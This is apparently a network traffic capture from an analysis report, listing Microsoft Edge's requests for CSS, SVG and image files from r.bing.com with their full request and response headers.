sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Last-Modified: Wed, 17 Aug 2022 05:37:56 GMT
ETag: 0x8DA8012A375BA1F
Content-Length: 371
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: 4tuirf7g+Nyb/4u8hynNlQ==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 180af447-301e-00a1-2ee8-eedfd1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=99667
Expires: Sun, 06 Oct 2024 19:46:36 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f09755b
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/eeGCipqheoe_uezlnNy3LLj5EpM.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/eeGCipqheoe_uezlnNy3LLj5EpM.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 193
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: IPHHEn9JEjMo2zYpXrkcQA==
Last-Modified: Wed, 17 Aug 2022 06:25:24 GMT
ETag: 0x8DA801944BB4441
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0e093914-e01e-001b-09d3-133aaf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=55411
Expires: Sun, 06 Oct 2024 07:29:00 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097773
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ASquubOekjWYCJwlunJ-aqgJVvM.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/ASquubOekjWYCJwlunJ-aqgJVvM.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 41
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: NT1lDvhbPWu1BUSseKtivA==
Last-Modified: Wed, 17 Aug 2022 05:22:40 GMT
ETag: 0x8DA80108192B8E4
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1f58f196-501e-0006-7d2b-30d3ee000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=64133
Expires: Sun, 06 Oct 2024 09:54:23 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f097944
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/tPLNa5UcMaQEzzg0acZfPM45N6I.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/tPLNa5UcMaQEzzg0acZfPM45N6I.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 1341
Content-Type: text/css
Content-Encoding: gzip
Content-MD5: WX/sslb8tPUCRYKUX1pQ4A==
Last-Modified: Tue, 24 Sep 2024 07:07:13 GMT
ETag: 0x8DCDC67841F50BE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2afda212-f01e-002d-73e7-146950000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=173967
Expires: Mon, 07 Oct 2024 16:25:00 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f097b61
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 1391
Content-Type: image/svg+xml
Content-MD5: YgWAZX6KRbSnuEULjaXNMg==
Last-Modified: Tue, 24 Sep 2024 06:54:00 GMT
ETag: 0x8DCDC65AB4005D8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b85ff5da-301e-003b-6433-16a8ce000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=316461
Expires: Wed, 09 Oct 2024 07:59:54 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099428
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 4409
Content-Type: image/jpeg
Content-MD5: qYoIvbmbhCLJ3J1v3ZOHww==
Last-Modified: Tue, 24 Sep 2024 06:55:51 GMT
ETag: 0x8DCDC65ED9B19A0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6b2372b1-601e-006c-5eb0-154143000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=260458
Expires: Tue, 08 Oct 2024 16:26:31 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099a0d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/rtWOo8CaMgE2MXkPxPlkltyg2A8.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/rtWOo8CaMgE2MXkPxPlkltyg2A8.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 948
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: g3kqI15MUSAsm2yF6vR7Yw==
Last-Modified: Tue, 01 Aug 2023 16:20:58 GMT
ETag: 0x8DB92AB4A3BD877
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f8c50259-801e-000d-5aff-13cc78000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=74265
Expires: Sun, 06 Oct 2024 12:43:34 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f099b2b
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/yj7m_FD5mF9gOu3E6yQ461205q0.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/yj7m_FD5mF9gOu3E6yQ461205q0.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 56
Content-Type: text/css
Content-Encoding: br
Content-MD5: uhNHYqm/wpV/CrZXUrkD0A==
Last-Modified: Tue, 24 Sep 2024 07:15:21 GMT
ETag: 0x8DCDC68A6D7FC77
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b362cb38-001e-0033-3ba1-14b3bd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.bb777b5c.1727996822.588e64d
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=143854
Expires: Mon, 07 Oct 2024 08:03:23 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
